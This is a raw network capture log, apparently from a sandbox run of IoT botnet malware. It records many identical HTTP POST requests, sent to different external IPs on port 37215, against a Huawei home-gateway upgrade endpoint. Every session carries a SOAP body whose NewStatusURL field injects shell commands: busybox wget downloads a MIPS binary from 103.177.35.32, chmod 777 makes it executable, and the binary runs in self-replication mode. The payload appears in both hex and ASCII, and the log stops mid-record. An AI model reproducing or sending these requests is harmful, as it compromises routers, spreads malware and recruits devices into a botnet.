                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1511192.168.2.2337054157.148.64.9237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.544286013 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1512192.168.2.2340064197.43.209.4137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.544373989 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1513192.168.2.2339964121.120.194.137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.544971943 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1514192.168.2.2336726157.25.172.12337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.545047045 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1515192.168.2.2356254157.29.41.837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.545059919 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1516192.168.2.2347140197.153.74.11537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.545059919 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1517192.168.2.23451429.43.228.6837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.545069933 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1518192.168.2.234896241.48.146.18237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.545094967 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1519192.168.2.235298641.87.73.2037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.545119047 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1520192.168.2.2358082157.41.81.17237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.545120955 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
